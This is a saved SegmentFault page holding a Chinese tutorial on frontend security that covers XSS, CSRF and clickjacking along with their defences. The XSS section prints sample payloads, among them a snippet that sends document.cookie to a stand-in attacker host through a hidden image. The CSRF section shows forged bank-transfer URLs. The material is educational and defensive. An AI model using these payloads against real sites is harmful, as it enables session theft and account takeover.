
<!DOCTYPE html>
<html>
  <!-- OriginalSrc: https://segmentfault.com/a/1190000011514496 -->
  <head>
    <meta http-equiv="Content-Type" content="text/html"; charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <title>前端安全知识-安全</title>
    
<link rel="stylesheet" href="assets/1553499461-04b7a1551b9ea68bcf94f9ecf05846d5.css">

<link rel="stylesheet" href="assets/1553499461-1bfac5bfd1d0b194dacc6adc89cc954a.css">

<link rel="stylesheet" href="assets/1553499461-c86b6210e40f2befcca430cc00577148.css">
<style>

html.cye-enabled.cye-nm:not(*:-webkit-full-screen) body,
 html.cye-enabled.cye-nm:not(*:-webkit-full-screen) #cye-workaround-body {-webkit-filter:contrast(91%) brightness(84%) invert(1);}
</style>
<style>
html.cye-enabled.cye-lm body{background-color:#cce8cf !important;border-color:rgb(51, 58, 51) !important;background-image:none !important;color:#000000  !important}
</style>
<style>
html.cye-enabled.cye-lm div{background-color:#cce8cf !important;border-color:rgb(51, 58, 51) !important;background-image:none !important;color:#000000  !important}
</style>
<style>
html.cye-enabled.cye-lm th{background-color:#cce8cf !important;border-color:rgb(51, 58, 51) !important;background-image:none !important;color:#000000  !important}html.cye-enabled.cye-lm td{background-color:#cce8cf !important;border-color:rgb(51, 58, 51) !important;background-image:none !important;color:#000000  !important}
</style>
<style>
html.cye-enabled.cye-lm input[type=text]{background-color:#cce8cf !important;border-color:rgb(51, 58, 51) !important;background-image:none !important;color:#000000  !important}html.cye-enabled.cye-lm textarea{background-color:#cce8cf !important;border-color:rgb(51, 58, 51) !important;background-image:none !important;color:#000000  !important}
</style>
<style>
html.cye-enabled.cye-lm select{background-color:#cce8cf !important;border-color:rgb(51, 58, 51) !important;background-image:none !important;color:#000000  !important}
</style>
<style>
html.cye-enabled.cye-lm ul{background-color:#cce8cf !important;border-color:rgb(51, 58, 51) !important;background-image:none !important;color:#000000  !important}
</style>
<style>
html.cye-enabled.cye-lm .cye-lm-tag,html.cye-enabled.cye-lm.cye-lm-tag{background-color:#cce8cf !important;border-color:rgb(51, 58, 51) !important;background-image:none !important;color:#000000  !important}
</style>
<style>

</style>
<style>

</style>
<style>
object,embed{                -webkit-animation-duration:.001s;-webkit-animation-name:playerInserted;                -ms-animation-duration:.001s;-ms-animation-name:playerInserted;                -o-animation-duration:.001s;-o-animation-name:playerInserted;                animation-duration:.001s;animation-name:playerInserted;}                @-webkit-keyframes playerInserted{from{opacity:0.99;}to{opacity:1;}}                @-ms-keyframes playerInserted{from{opacity:0.99;}to{opacity:1;}}                @-o-keyframes playerInserted{from{opacity:0.99;}to{opacity:1;}}                @keyframes playerInserted{from{opacity:0.99;}to{opacity:1;}}
</style>
<style>
#rwl-iqxin{position:fixed;transform:translate(-90px,0);width:85px;height:25px;font-size:12px;font-weight: 500;font-family:Verdana, Arial, '宋体';color:#fff;background:#333;z-index:2147483647;margin: 0;opacity:0.05;transition:0.3s;overflow:hidden;user-select:none;text-align:center;white-space:nowrap;line-height:25px;padding:0 16px;border:1px solid #ccc;border-width:1px 1px 1px 0;border-bottom-right-radius:5px;box-sizing: content-box;}#rwl-iqxin input{margin: 0;padding: 0;vertical-align:middle;-webkit-appearance:checkbox;-moz-appearance:checkbox;position: static;clip: auto;opacity: 1;cursor: pointer;}#rwl-iqxin.rwl-active-iqxin{left: 0px;transform:translate(0,0);opacity: 0.9;height: 32px;line-height: 32px}#rwl-iqxin label{margin:0;padding:0;font-weight:500;}#rwl-iqxin button{margin: 0;padding: 0 2px;border: none;border-radius: 2px;cursor: pointer;}#rwl-setMenu{text-align:left;font-size:14px;z-index:999999;border: 1px solid cornflowerblue;}#rwl-setMenu p{margin:5px auto;} 
</style>
<style>

                                    @media (max-width: 1200px) {
                                        .trialCenter-wrapper {
                                            display: none !important;
                                        }
                                    }
                                
</style>
<style>

                    .job-recommend-area a:not(:last-of-type) {margin-bottom:10px; display: block}
                    .job-recommend-area a:hover {text-decoration: none;}
                
</style>
<style>

                    .job-recommend {margin-bottom: 30px;}
                    .job-title {
                        font-size: 14px;
                        color: #017E66;
                        font-weight: 500;
                        background: #BFE6D7;
                        margin: 0;
                        padding-top: 6px;
                        padding-bottom: 6px;
                        text-align: center;
                    }
                    .job-recommend-area {
                      padding: 13px;
                      border: 3px solid #EBF7F3;
                      border-top: none;
                    }
                    
</style>
<style>
#leftdiv,#rightdiv,#stickey_footer,#top_box,.ershiba,.recommend-box,.floatBottom img,.ad_float_left,body .img,.side-widget,.blog-post  .row .side,.content__tech{display:none!important;}<br>.box.pic_text img,#wp img,#postlist img{max-height: 400px;width: auto;}<br>.post-topheader__info--title{text-align: center;}<br>.blog-post  .row .main,.container.main-container .container,.main-area.article-area{width: 100%;max-width: 100%;}<br><br>#juejin .container{max-width:1140px;}<br><br>.container.main-container .sidebar,.container.main-container .article-suspended-panel,.global-component-box .suspension-panel{display:none!important;}
</style>

    <style class="mx-wc-style">
      .mx-wc-main img {max-width: 100%;}
      .mx-wc-main{
        box-sizing: content-box;
        background-color: rgb(255, 255, 255) !important;
        margin: 0 auto;
        max-width: 1140px;
        padding: 15px 15px 80px 15px;
      }

      .clipping-information{
        text-align: left;
        margin-top: 20px;
        background-color: #eeeeee !important;
        padding: 15px;
        border-radius: 4px;
        color: #333;
        font-size: 14px !important;
        line-height: 22px !important;
      }
      .clipping-information a {
        color: blue !important;
        text-decoration: underline !important;
      }
      .clipping-information label {
        display: inline;
        text-transform: none;
      }
      .clipping-information label > code {
        padding: 2px 8px;
        background-color: rgba(200, 200, 200, 0.7)!important;
        font-size: 14px;
      }

    </style>
  </head>
  <body style="background-color: #464646 !important; min-height: 100%; height: auto;" id="" class="blog-post ">
    <div class="mx-wc-main">
      <DIV class="wrap" data-blogid="1200000008933518" style="display: block; float: none; position: relative; top: 0; left: 0; border: 0px; width: 100%; min-width:100%; max-width: 100%; min-height: auto; max-height: 100%; height: auto; padding: 0px; margin: 0px;"><div class="container mt15 mx-wc-selected-elem" style="float: none; position: relative; top: 0px; left: 0px; margin: 0px; flex: unset; width: 100%; max-width: 100%; box-sizing: border-box;">
        <div class="row">
            <div class="col-xs-12 col-md-9 main ">
                                <ol class="breadcrumb mb15">
                    <li><a href="https://segmentfault.com/blogs">专栏</a></li>
                                        <li><a href="https://segmentfault.com/blog/jkchao">漫漫长路</a></li>
                                        <li class="active">文章详情</li>
                </ol>
                                <div class="post-topheader custom- pt0">
                    <div class="mb20">
                        <div class="block-for-right-border">
                            <div class="row">
                                <div class="col-md-12 col-sm-12 col-xs-12">
                                

                                    <div class="post-topheader__info" data-username="三毛" data-userslug="sanmao_58e1f28560e06" data-useravatar="https://avatar-static.segmentfault.com/204/181/2041816010-58e1f2b9e809d_big64">


                                        <div class="article__author clearfix">
                                            <div class="article__authorleft">
                                                <a href="https://segmentfault.com/u/sanmao_58e1f28560e06">
                                                    <img class="avatar-40" src="assets/1553499461-d82116bbfb8b53e38f272b439839d546" alt="三毛">
                                                </a>
                                            </div>
                                            <div class="article__authorright">
                                                <div class="article__authormeta">
                                                <a href="https://segmentfault.com/u/sanmao_58e1f28560e06" class="mr5"><strong>三毛</strong></a>
                                        
                                                
                                                                                                <img src="assets/1553499461-931d92cf7ef28749ea3dfbf0af6a2563.svg" class="mr5"><span style="color:#BF7158" class="mr10">499</span>

                                                                                                发布于
                                                <a href="https://segmentfault.com/blog/jkchao">漫漫长路</a>
                                                
                                                
                                                <span class="hidden-xs">
                                                                                                                                                          <button type="button" class="btn btn-xs btn-success follow-article ml10" data-do="follow" data-type="blog" data-id="1200000008933518">关注专栏
                                                       </button>
                                                                                                                                                   </span>
                                                </div>
                                                
                                                <span style="display: block">
                                                    2017-10-11 发布
                                                </span>
                                            </div>
                                        </div>

                                        <h1 class="h1 post-topheader__info--title" id="articleTitle" data-id="1190000011514496">
                                            <a href="https://segmentfault.com/a/1190000011514496"> 前端安全知识</a>
                                        </h1>

                                        
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div><!-- end .post-topheader -->

                <div class="visible-lg">
                    
                </div>

                
                <div class="article fmt article__content" data-id="1190000011514496" data-license="cc">
                    
<blockquote>原文连接 <a href="https://jkchao.cn/article/59de0283c52d5a4ba98b1f0d" rel="nofollow noreferrer" target="_blank">https://jkchao.cn/article/59d...</a>
</blockquote>
<h1 id="articleHeader0">XSS</h1>
<p>xss: 跨站脚本攻击（Cross Site Scripting）是最常见和基本的攻击 WEB 网站方法，攻击者通过注入非法的 html 标签或者 javascript 代码，从而当用户浏览该网页时，控制用户浏览器。</p>
<p>xss 主要分为三类：</p>
<ul>
<li>DOM xss :<p>DOM即文本对象模型，DOM通常代表在html、xhtml和xml中的对象，使用DOM可以允许程序和脚本动态的访问和更新文档的内容、结构和样式。它不需要服务器解析响应的直接参与，触发XSS靠的是浏览器端的DOM解析，可以认为完全是客户端的事情。</p>
</li>
<li>反射型 xss :<p>反射型XSS也被称为非持久性XSS，是现在最容易出现的一种XSS漏洞。发出请求时，XSS代码出现在URL中，最后输入提交到服务器，服务器解析后在响应内容中出现这段XSS代码，最后浏览器解析执行。</p>
</li>
<li>存储型 xss :<p>存储型XSS又被称为持久性XSS，它是最危险的一种跨站脚本，相比反射型XSS和DOM型XSS具有更高的隐蔽性，所以危害更大，因为它不需要用户手动触发。 允许用户存储数据的web程序都可能存在存储型XSS漏洞，当攻击者提交一段XSS代码后，被服务器端接收并存储，当所有浏览者访问某个页面时都会被XSS，其中最典型的例子就是留言板。</p>
</li>
</ul>
<p>跨站脚本攻击可能造成以下影响：</p>
<ul>
<li>利用虚假输入表单骗取用户个人信息。</li>
<li>利用脚本窃取用户的 Cookie 值，被害者在不知情的情况下，帮助攻击者发送恶意请求。</li>
<li>显示伪造的文章或图片。</li>
</ul>
<h3 id="articleHeader1">存储型 xss 案例</h3>
<p>在项目开发中，评论是个常见的功能，如果直接把评论的内容保存到数据库，那么显示的时候就可能被攻击。</p>
<ul>
<li>
<p>如果你只是想试试 xss，可以这样：</p>
<pre class="javascript hljs"><code class="javascript">&lt;font size=<span class="hljs-string">"100"</span> color=<span class="hljs-string">"red"</span>&gt;试试水&lt;<span class="hljs-regexp">/font&gt;
</span></code></pre>
<p><span class="img-wrap"><img data-src="assets/1553499461-4daa81f25ffa1f7f5edea25e2bc95c17.png" src="assets/1553499461-4daa81f25ffa1f7f5edea25e2bc95c17.png" alt="" title="" style="cursor: pointer; display: inline;"></span></p>
</li>
<li>
<p>如果带点恶意，可以这样：</p>
<pre class="javascript hljs"><code class="javascript">&lt;script&gt;
    <span class="hljs-keyword">while</span> (<span class="hljs-literal">true</span>) {
        alert(<span class="hljs-string">'Hello'</span>)
    }
&lt;<span class="hljs-regexp">/script&gt;</span></code></pre>
<p>这时，网站就挂了。</p>
</li>
<li>
<p>当然，最常见 xss 攻击是读取 Cookie：</p>
<pre class="javascript hljs"><code class="javascript">&lt;script&gt;
    alert(<span class="hljs-built_in">document</span>.cookie)
&lt;<span class="hljs-regexp">/script&gt;</span></code></pre>
<p><span class="img-wrap"><img data-src="assets/1553499461-8e9f555097b5c4009ea6a6574a07a14a.png" src="assets/1553499461-8e9f555097b5c4009ea6a6574a07a14a.png" alt="" title="" style="cursor: pointer; display: inline;"></span></p>
<p>Cookie 发送给攻击者的站点：</p>
<pre class="javascript hljs"><code class="javascript"><span class="hljs-keyword">var</span> img = <span class="hljs-built_in">document</span>.createElement(<span class="hljs-string">'img'</span>)
img.src=<span class="hljs-string">'http://www.xss.com?cookie='</span> + <span class="hljs-built_in">document</span>.cookie
img.style.display=<span class="hljs-string">'none'</span>
<span class="hljs-built_in">document</span>.getElementsByTagName(<span class="hljs-string">'body'</span>)[<span class="hljs-number">0</span>].appendChild(img)</code></pre>
<p>当前用户的登录凭证存储于服务器的 session 中，而在浏览器中是以 cookie 的形式存储的。如果攻击者能获取到用户登录凭证的 Cookie，甚至可以绕开登录流程，直接设置这个 Cookie 值，来访问用户的账号。</p>
</li>
</ul>
<h3 id="articleHeader2">防御</h3>
<p>按理说，只要有输入数据的地方，就可能存在 XSS 危险。</p>
<ul>
<li>
<p>httpOnly: 在 cookie 中设置 HttpOnly 属性后，js脚本将无法读取到 cookie 信息。</p>
<pre class="javascript hljs"><code class="javascript"><span class="hljs-comment">// koa</span>
ctx.cookies.set(name, value, {
    <span class="hljs-attr">httpOnly</span>: <span class="hljs-literal">true</span> <span class="hljs-comment">// 默认为 true</span>
})</code></pre>
</li>
<li><p>过滤</p></li>
<li><ul>
<li>输入检查，一般是用于对于输入格式的检查，例如：邮箱，电话号码，用户名，密码……等，按照规定的格式输入。<p>不仅仅是前端负责，后端也要做相同的过滤检查。</p>
<p>因为攻击者完全可以绕过正常的输入流程，直接利用相关接口向服务器发送设置。</p>
</li>
<li>HtmlEncode<br>某些情况下，不能对用户数据进行严格过滤，需要对标签进行转换<p><span class="img-wrap"><img data-src="assets/1553499461-b967967d709f5a84c5dbce8cc4365072.png" src="assets/1553499461-b967967d709f5a84c5dbce8cc4365072.png" alt="" title="" style="cursor: pointer; display: inline;"></span></p>
<p>当用户输入<code>&lt;script&gt;window.location.href=”http://www.baidu.com”;&lt;/script&gt;</code>, 最终保存结果为 <code>&lt;script&gt;window.location.href="http://www.baidu.com"&lt;/script&gt;</code>, 在展现时，浏览器会对这些字符转换成文本内容，而不是一段可以执行的代码。</p>
</li>
</ul></li>
<ul><li>JavaScriptEncode<br>  对下列字符加上反斜杠<p><span class="img-wrap"><img data-src="assets/1553499461-906bf34d92b7b6520c5118ddbcc79afb.png" src="assets/1553499461-906bf34d92b7b6520c5118ddbcc79afb.png" alt="" title="" style="cursor: pointer; display: inline;"></span></p>
<p>关于更多 HtmlEncode 和 JavaScriptEncode，请参考 <a href="http://www.cnblogs.com/lovesong/p/5211667.html" rel="nofollow noreferrer" target="_blank">http://www.cnblogs.com/loveso...</a></p>
</li></ul>
</ul>
<h1 id="articleHeader3">CSRF</h1>
<p>csrf：跨站点请求伪造（Cross-Site Request Forgeries），也被称为 one-click attack 或者 session riding。冒充用户发起请求（在用户不知情的情况下）， 完成一些违背用户意愿的事情（如修改用户信息，删初评论等）。</p>
<p>可能会造成以下影响：</p>
<ul>
<li>利用已通过认证的用户权限更新设定信息等；</li>
<li>利用已通过认证的用户权限购买商品；</li>
<li>利用已通过的用户权限在留言板上发表言论。</li>
</ul>
<p>一张图了解原理：</p>
<p><span class="img-wrap"><img data-src="assets/1553499461-d9cbfa0f8492728b5b66f988562f4b90.png" src="assets/1553499461-d9cbfa0f8492728b5b66f988562f4b90.png" alt="" title="" style="cursor: pointer; display: inline;"></span></p>
<p>简而言之：网站过分相信用户。</p>
<h3 id="articleHeader4">与 xss 区别</h3>
<ul>
<li>通常来说 CSRF 是由 XSS 实现的，CSRF 时常也被称为      XSRF（CSRF 实现的方式还可以是直接通过命令行发起请求等）。</li>
<li>本质上讲，XSS 是代码注入问题，CSRF 是 HTTP 问题。XSS 是内容没有过滤导致浏览器将攻击者的输入当代码执行。CSRF 则是因为浏览器在发送 HTTP 请求时候自动带上 cookie，而一般网站的 session 都存在 cookie里面。</li>
<li>来自某乎的一个栗子：<p><span class="img-wrap"><img data-src="assets/1553499461-c76b149cc7bd483bd945f9e9977d5f50.png" src="assets/1553499461-c76b149cc7bd483bd945f9e9977d5f50.png" alt="" title="" style="cursor: pointer; display: inline;"></span></p>
</li>
</ul>
<h3 id="articleHeader5">案例</h3>
<p>比如某网站的转账操作</p>
<p>受害者张三给李四转账100，</p>
<p>通过对银行的网站发起请求 <a href="http://bank.example/transfer?accout=%E5%BC%A0%E4%B8%89&amp;to=%E6%9D%8E%E5%9B%9B&amp;money=100" rel="nofollow noreferrer" target="_blank">http://bank.example/transfer?...</a> ，</p>
<p>通常情况下，该请求发出后，服务器端会检查 session 是否合法，并且张三已经登录成功，</p>
<p>黑客王五可以自己给银行发送一个请求 <a href="http://bank.example/transfer?accout=%E5%BC%A0%E4%B8%89&amp;to=%E7%8E%8B%E4%BA%94&amp;money=1000" rel="nofollow noreferrer" target="_blank">http://bank.example/transfer?...</a> ，但是这个请求来自王五，而不是张三，他并不能通过安全认证。他需要张三的 session 。</p>
<p>王五自己做了一个网站，放入如下代码 <a href="http://bank.example/transfer?accout=%E5%BC%A0%E4%B8%89&amp;to=%E7%8E%8B%E4%BA%94&amp;money=1000" rel="nofollow noreferrer" target="_blank">http://bank.example/transfer?...</a> ，<br>用各种方式诱使张三点击自己的网站。</p>
<p>张三登录了银行的网站没有退出，访问了黑客王五的网站，上述的 url 就会向银行发起请求。</p>
<p>如果session没有过期，这时悲剧就发生了，张三的账户里少了1000。</p>
<h3 id="articleHeader6">防御</h3>
<ul>
<li>验证码；强制用户必须与应用进行交互，才能完成最终请求。此种方式能很好的遏制 csrf，但是用户体验比较差。</li>
<li>尽量使用 post ，限制 get 使用；上一个例子可见，get 太容易被拿来做 csrf 攻击，但是 post 也并不是万无一失，攻击者只需要构造一个form就可以。</li>
<li>Referer check；请求来源限制，此种方法成本最低，但是并不能保证 100% 有效，因为服务器并不是什么时候都能取到 Referer，而且低版本的浏览器存在伪造 Referer 的风险。</li>
<li>
<p>token；token 验证的 CSRF 防御机制是公认最合适的方案。</p>
<p>整体思路如下：</p>
<ul>
<li>第一步：后端随机产生一个 token，把这个token 保存到 session 状态中；同时后端把这个token 交给前端页面；</li>
<li>第二步：前端页面提交请求时，把 token 加入到请求数据或者头信息中，一起传给后端；</li>
<li>后端验证前端传来的 token 与 session 是否一致，一致则合法，否则是非法请求。</li>
</ul>
</li>
</ul>
<pre class="hljs markdown"><code><span class="hljs-strong">**若网站同时存在 XSS 漏洞的时候，这个方法也是空谈。**</span> 

</code></pre>
<h3 id="articleHeader7">Clickjacking</h3>
<p>Clickjacking： 点击劫持，是指利用透明的按钮或连接做成陷阱，覆盖在 Web 页面之上。然后诱使用户在不知情的情况下，点击那个连接访问内容的一种攻击手段。这种行为又称为界面伪装(UI Redressing) 。</p>
<p>大概有两种方式：</p>
<ul>
<li>攻击者使用一个透明 iframe，覆盖在一个网页上，然后诱使用户在该页面上进行操作，此时用户将在不知情的情况下点击透明的 iframe 页面；</li>
<li>攻击者使用一张图片覆盖在网页，遮挡网页原有的位置含义。</li>
</ul>
<h3 id="articleHeader8">案例</h3>
<p>一张图了解</p>
<p><span class="img-wrap"><img data-src="assets/1553499461-f22701a4d27d51fde3093aea615e02a9.png" src="assets/1553499461-f22701a4d27d51fde3093aea615e02a9.png" alt="" title="" style="cursor: pointer; display: inline;"></span></p>
<p>一般步骤</p>
<ul>
<li>黑客创建一个网页利用 iframe 包含目标网站；</li>
<li>隐藏目标网站，使用户无法无法察觉到目标网站存在；</li>
<li>构造网页，诱变用户点击特点按钮</li>
<li>用户在不知情的情况下点击按钮，触发执行恶意网页的命令。</li>
</ul>
<h3 id="articleHeader9">防御</h3>
<ul><li>
<p>X-FRAME-OPTIONS；</p>
<p>X-FRAME-OPTIONS HTTP 响应头是用来给浏览器指示允许一个页面可否在<code>&lt;frame&gt;</code>, <code>&lt;iframe&gt;</code> 或者 <code>&lt;object&gt;</code> 中展现的标记。网站可以使用此功能，来确保自己网站内容没有被嵌到别人的网站中去，也从而避免点击劫持的攻击。</p>
<p>有三个值：</p>
<ul>
<li>DENY：表示页面不允许在 frame 中展示，即便是在相同域名的页面中嵌套也不允许。</li>
<li>SAMEORIGIN：表示该页面可以在相同域名页面的 frame 中展示。</li>
<li>ALLOW-FROM url：表示该页面可以在指定来源的 frame 中展示。</li>
</ul>
</li></ul>
<p>配置 X-FRAME-OPTIONS：</p>
<pre class="hljs typescript"><code>- Apache 

把下面这行添加到 <span class="hljs-string">'site'</span> 的配置中：

<span class="hljs-string">``</span><span class="hljs-string">`
Header always append X-Frame-Options SAMEORIGIN
`</span><span class="hljs-string">``</span>

- nginx

把下面这行添加到 <span class="hljs-string">'http'</span>, <span class="hljs-string">'server'</span> 或者 <span class="hljs-string">'location'</span>，配置中

<span class="hljs-string">``</span><span class="hljs-string">`
add_header X-Frame-Options SAMEORIGIN;
`</span><span class="hljs-string">``</span>

- IIS

添加下面配置到 Web.config 文件中

<span class="hljs-string">``</span><span class="hljs-string">`
    &lt;system.webServer&gt;
  ...

  &lt;httpProtocol&gt;
    &lt;customHeaders&gt;
      &lt;add name="X-Frame-Options" value="SAMEORIGIN" /&gt;
    &lt;/customHeaders&gt;
  &lt;/httpProtocol&gt;

  ...
&lt;/system.webServer&gt;

`</span><span class="hljs-string">``</span>
</code></pre>
<ul><li>js 判断顶层窗口跳转，可轻易破解，意义不大；</li></ul>
<pre class="javascript hljs"><code class="javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">locationTop</span>(<span class="hljs-params"></span>)</span>{
     <span class="hljs-keyword">if</span> (top.location != self.location) {
        top.location = self.location; <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;
     }
     <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>; 
    }
locationTop();</code></pre>
<pre class="javascript hljs"><code class="javascript"><span class="hljs-comment">// 破解：</span>
<span class="hljs-comment">// 顶层窗口中放入代码</span>
<span class="hljs-keyword">var</span> location = <span class="hljs-built_in">document</span>.location;
<span class="hljs-comment">//或者</span>
<span class="hljs-keyword">var</span> location = <span class="hljs-string">""</span>;</code></pre>

                </div>
                                                
                <div class="clearfix mt10">
                    <ul class="article-operation list-inline pull-left mt15"><li><a target="_blank" href="https://creativecommons.org/licenses/by-nc-nd/4.0/"><img class="mb5" src="assets/1553499461-f34a74adc5c037a50738f95ba4954abd.svg" height="20"></a></li><li class="dropdown js__content-ops hidden-xs" data-module="article" data-id="1190000011514496" data-typetext="文章"><a href="javascript:void(0);" class="dropdown-toggle text-muted" data-toggle="dropdown"><i class="fa fa-ellipsis-h" aria-hidden="true"></i></a></li></ul>
                    <div class="pull-right mt-10 hidden-xs">
                        <div class="widget-share__full" data-text="前端安全知识" data-url="https://segmentfault.com/a/1190000011514496?share_user=1030000009484911" data-shorturl="http://sfau.lt/b5WtBQ"><div class="widget-share-network sharer-0" style="display: block;"><ul class="sn-inline"><li data-network="weibo"><a href="javascript:void(0);" class="entypo-weibo icon-sn-weibo share-1" data-toggle="tooltip" data-placement="top" title="" data-original-title="分享至新浪微博">新浪微博</a></li><li data-network="wechart"><a href="javascript:void(0);" class="entypo-wechart icon-sn-weixin share-2" data-toggle="tooltip" data-placement="top" title="" data-original-title="分享至微信">微信</a></li><li data-network="twitter"><a href="javascript:void(0);" class="entypo-twitter icon-sn-twitter share-3" data-toggle="tooltip" data-placement="top" title="" data-original-title="分享至 Twitter">Twitter</a></li><li data-network="facebook"><a href="javascript:void(0);" class="entypo-facebook icon-sn-facebook share-4" data-toggle="tooltip" data-placement="top" title="" data-original-title="分享至 Facebook">Facebook</a></li></ul></div><a type="button" class="btn btn-sm shareMore btn-sn-more" data-toggle="popover" data-placement="top" data-url="https://segmentfault.com/a/1190000011514496?share_user=1030000009484911" data-shorturl="http://sfau.lt/b5WtBQ"><span class="icon-sn-dotted" data-original-title="" title=""></span></a></div>


                    </div>
                </div>
                <div class="mt10 text-center mb30"><button type="button" id="mainLike" data-id="1190000011514496" class="btn btn-success btn-lg mr15 "><span id="mainLikeText">赞</span>&nbsp;&nbsp;<span class="seprator">|</span>&nbsp;&nbsp;
                                <span id="mainLikeNum">5 </span></button><button type="button" id="mainBookmark" data-type="article" data-id="1190000011514496" class="btn btn-default btn-lg "><span id="mainBookmarkText">收藏</span>&nbsp;&nbsp;<span class="seprator">|</span>&nbsp;&nbsp;<span id="mainBookmarkNum">16</span></button></div>                
                                

                <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的</h4>

                
                <div class="mb15 block">
                    
                </div>

                                <div id="paradigm-article-related"><div class="recommend-post mb30"><ul class="widget-links"><li><a href="http://segmentfault.com/a/1190000010560529" title="socket.io+express实现聊天室的思考（三）" target="_blank">socket.io+express实现聊天室的思考（三）</a><span class="text-muted">昵称不能随便取</span><a class="tag" taget="_blank" href="https://segmentfault.com/t/javascript">javascript</a><a class="tag" taget="_blank" href="https://segmentfault.com/t/node.js">node.js</a><a class="tag" taget="_blank" href="https://segmentfault.com/t/socket.io">socket.io</a></li><li><a href="http://segmentfault.com/a/1190000008423064" title="前端安全之XSS攻击" target="_blank">前端安全之XSS攻击</a><span class="text-muted">_ipo</span><a class="tag" taget="_blank" href="https://segmentfault.com/t/javascript">javascript</a></li><li><a href="http://segmentfault.com/a/1190000013315450" title="XSS攻击原理分析与防御技术" target="_blank">XSS攻击原理分析与防御技术</a><span class="text-muted">小柚子</span><a class="tag" taget="_blank" href="https://segmentfault.com/t/xss">xss</a><a class="tag" taget="_blank" href="https://segmentfault.com/t/web%E5%AE%89%E5%85%A8">web安全</a><a class="tag" taget="_blank" href="https://segmentfault.com/t/node.js">node.js</a><a class="tag" taget="_blank" href="https://segmentfault.com/t/javascript">javascript</a></li><li><a href="http://segmentfault.com/a/1190000009077090" title="安全->XSS" target="_blank">安全-&gt;XSS</a><span class="text-muted">jsdt</span><a class="tag" taget="_blank" href="https://segmentfault.com/t/javascript">javascript</a><a class="tag" taget="_blank" href="https://segmentfault.com/t/%E5%AE%89%E5%85%A8">安全</a><a class="tag" taget="_blank" href="https://segmentfault.com/t/web">web</a></li><li><a href="http://segmentfault.com/a/1190000006908228" title="Android安全之WebViewUXSS漏洞" target="_blank">Android安全之WebViewUXSS漏洞</a><span class="text-muted">YAQ御安全</span><a class="tag" taget="_blank" href="https://segmentfault.com/t/%E5%AE%89%E5%85%A8%E9%98%B2%E6%8A%A4">安全防护</a><a class="tag" taget="_blank" href="https://segmentfault.com/t/app%E5%BA%94%E7%94%A8">app应用</a><a class="tag" taget="_blank" href="https://segmentfault.com/t/xss">xss</a><a class="tag" taget="_blank" href="https://segmentfault.com/t/webview">webview</a><a class="tag" taget="_blank" href="https://segmentfault.com/t/android">android</a></li><li><a href="http://segmentfault.com/a/1190000004139891" title="XSS跨站脚本攻击" target="_blank">XSS跨站脚本攻击</a><span class="text-muted">山河永寂</span><a class="tag" taget="_blank" href="https://segmentfault.com/t/xss">xss</a></li><li><a href="http://segmentfault.com/a/1190000010869619" title="史上前端面试最全问答（附答案）" target="_blank">史上前端面试最全问答（附答案）</a><span class="text-muted">AlloyTeamZy</span><a class="tag" taget="_blank" href="https://segmentfault.com/t/javascript">javascript</a><a class="tag" taget="_blank" href="https://segmentfault.com/t/html">html</a><a class="tag" taget="_blank" href="https://segmentfault.com/t/css">css</a></li><li><a href="http://segmentfault.com/a/1190000006904327" title="【译】Excess-XSS 一份关于 XSS 的综合教程" target="_blank">【译】Excess-XSS 一份关于 XSS 的综合教程</a><span class="text-muted">HtmlCssJs</span><a class="tag" taget="_blank" href="https://segmentfault.com/t/%E5%AE%89%E5%85%A8">安全</a><a class="tag" taget="_blank" href="https://segmentfault.com/t/xss">xss</a></li></ul></div></div>

                
        <div class="comments--news comments--default comments--article 
    " data-id="1190000011514496" data-user-id="1030000009484911" data-author-id="1030000008933482 " data-is-admin="false" id="goToReplyArea">
                    <div class="mb10 clearfix">
                <strong class="comments-stat pull-left mr10">评论</strong>

                                                    <div class="btn-group btn-group-xs pull-right comments-sort btn-group-menu" role="menu">
                        <a href="javascript:;" class="btn btn-default active" data-sort="default">默认排序</a>
                        <a href="javascript:;" class="btn btn-default" data-sort="desc">时间排序</a>
                    </div>
                            </div>
                <div class="comments-container">
                                <div class="comments-list">
            </div>
    
        
    

                                    <div class="comments-box" id="goToReplyEditor">
                <div class="pull-left">
                    <img class="avatar-32 " src="assets/1553499461-02f3a8501cc3cda2fcd3970e7a8ce26d.png" alt="">
                </div>
                <div class="comments-box-content">
                    <form action="/api/article/1190000011514496/comments/add">
                        <div class="form-group mb0">
                            <textarea name="text" rows="3" class="form-control" placeholder="文明社会，理性评论"></textarea>
                            <div class="mt15 text-right">
                                
                                <button class=" btn btn-primary" type="button">发布评论</button>
                            </div>
                        </div>
                    </form>
                </div>
            </div>
                                                        </div>
    </div>


                
                

            </div><!-- /.main -->


            <!-- /.side -->
        </div>
    </div></DIV>
      
        <hr />
        <!-- clipping information -->
        <div class="clipping-information">
          <label>原网址: <a href="https://segmentfault.com/a/1190000011514496" target="_blank" referrerpolicy="no-referrer" rel="noopener noreferrer">访问</a></label><br />
          <label>创建于: 2019-03-25 15:37:41</label><br />
          <label>目录: default</label><br />
          <label>标签: 无</label>
        </div>
    </div>
  </body>
</html>